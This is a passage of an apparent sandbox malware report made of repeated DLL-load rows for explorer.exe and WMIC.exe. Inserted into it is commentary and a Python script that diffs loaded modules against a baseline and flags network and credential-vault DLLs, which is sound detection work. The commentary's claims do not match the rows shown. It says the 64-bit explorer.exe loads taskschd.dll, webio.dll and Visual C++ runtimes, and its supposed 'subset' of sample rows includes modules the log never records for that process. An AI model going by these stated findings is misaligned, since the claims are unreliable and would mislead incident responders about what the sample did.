    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: vaultcli.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: webio.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: schannel.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
    Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
    Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
    Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
    Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
    Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
    Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
    Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
    Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
    Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
    Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
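The module-load rows for the two explorer.exe instances are the other half of the picture. The report's signatures already record that the sample injects into explorer.exe, and the rows show what the injected code then pulls in: the 32-bit explorer.exe running from C:\Windows\SysWOW64 loads winhttp.dll, webio.dll, schannel.dll, ncryptsslp.dll and mskeyprotect.dll (an HTTPS client stack), dnsapi.dll and mswsock.dll (name resolution and sockets), and vaultcli.dll plus dpapi.dll (the credential vault and DPAPI), none of which a desktop shell needs to draw the taskbar; the 64-bit C:\Windows\explorer.exe picks up taskschd.dll, webio.dll and a Visual C++ 2015+ runtime (vcruntime140.dll, msvcp140.dll) it was not built against. The following is an added example, not part of the Joe Sandbox report, of turning image-load telemetry into that observation: it groups modules per image path and diffs them against a per-image baseline, flagging both an image running from an unexpected path and modules outside the baseline, with the network and credential-store DLLs called out separately. The baseline, the expected explorer.exe path and the embedded sample rows (a subset of the report's rows) are constructed for this demonstration; a real baseline is measured on clean reference hosts, not assumed.

```python
"""Diff a process's loaded modules against an expected baseline.

Added example, not part of the Joe Sandbox report. The baseline and the
expected image path below are assumptions made for the demonstration.
"""
import re
from collections import defaultdict

# Row shape of the report; the " | " separator is optional so the raw
# run-together "explorer.exeSection loaded:" form parses as well.
LOAD_RE = re.compile(r"^Source:\s*(?P<image>.*?)\s*\|?\s*Section loaded:\s*(?P<module>\S+)")

# Constructed baseline (assumption): modules the shell is expected to load.
# In practice this set is collected from clean hosts, per image name.
EXPECTED_MODULES = {
    "explorer.exe": {
        "aepic.dll", "twinapi.dll", "twinapi.appcore.dll", "userenv.dll", "iphlpapi.dll",
        "powrprof.dll", "windows.storage.dll", "dxgi.dll", "kernel.appcore.dll",
        "propsys.dll", "coremessaging.dll", "urlmon.dll", "iertutil.dll", "wtsapi32.dll",
        "uxtheme.dll", "dwmapi.dll", "sspicli.dll", "ntmarta.dll", "cryptsp.dll",
        "wldp.dll", "srvcli.dll", "netutils.dll", "umpdc.dll", "profapi.dll",
        "cryptbase.dll", "wintypes.dll",
    },
}
# Constructed expectation (assumption): where each audited image normally runs from.
EXPECTED_PATHS = {"explorer.exe": {r"c:\windows\explorer.exe"}}
# DLLs that hand injected code HTTP(S), TLS, DNS, sockets or credential-store access.
NETWORK_OR_SECRET_MODULES = {
    "winhttp.dll", "wininet.dll", "webio.dll", "mswsock.dll", "dnsapi.dll",
    "schannel.dll", "ncryptsslp.dll", "mskeyprotect.dll", "vaultcli.dll", "dpapi.dll",
}

# Constructed sample: a subset of the report's module-load rows.
SAMPLE_LOADS = r"""
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
"""


def parse_loads(log_text):
    """Map each image path to the set of module names it loaded (lower-cased)."""
    loads = defaultdict(set)
    for line in log_text.splitlines():
        m = LOAD_RE.match(line.strip())
        if m:
            loads[m.group("image").strip()].add(m.group("module").lower())
    return loads


def audit(loads):
    """For every image we hold a baseline for, report the path anomaly and the
    modules outside the baseline; images without a baseline are skipped."""
    findings = {}
    for image_path, modules in loads.items():
        name = image_path.rsplit("\\", 1)[-1].lower()
        if name not in EXPECTED_MODULES:
            continue
        unexpected = modules - EXPECTED_MODULES[name]
        findings[image_path] = {
            "unexpected_path": image_path.lower() not in EXPECTED_PATHS.get(name, set()),
            "unexpected_modules": sorted(unexpected),
            "network_or_secret_modules": sorted(unexpected & NETWORK_OR_SECRET_MODULES),
        }
    return findings


if __name__ == "__main__":
    for image, f in audit(parse_loads(SAMPLE_LOADS)).items():
        print(image, "unexpected path" if f["unexpected_path"] else "expected path",
              "extra:", ", ".join(f["unexpected_modules"]) or "none")
```

The baseline diff is deliberately dumb: it does not try to decide whether a module is bad, only whether this process has ever been seen loading it, which is what makes a shell that suddenly speaks TLS and reads the credential vault stand out in Sysmon event ID 7 data without a signature for the injected payload.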
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
    Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
    Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
    Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
    Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
    Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
    Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
    Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
    Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
    Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
    Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
    Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
    Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
    Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
    Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
    Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
    Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
    Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
    Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
    Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
    Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
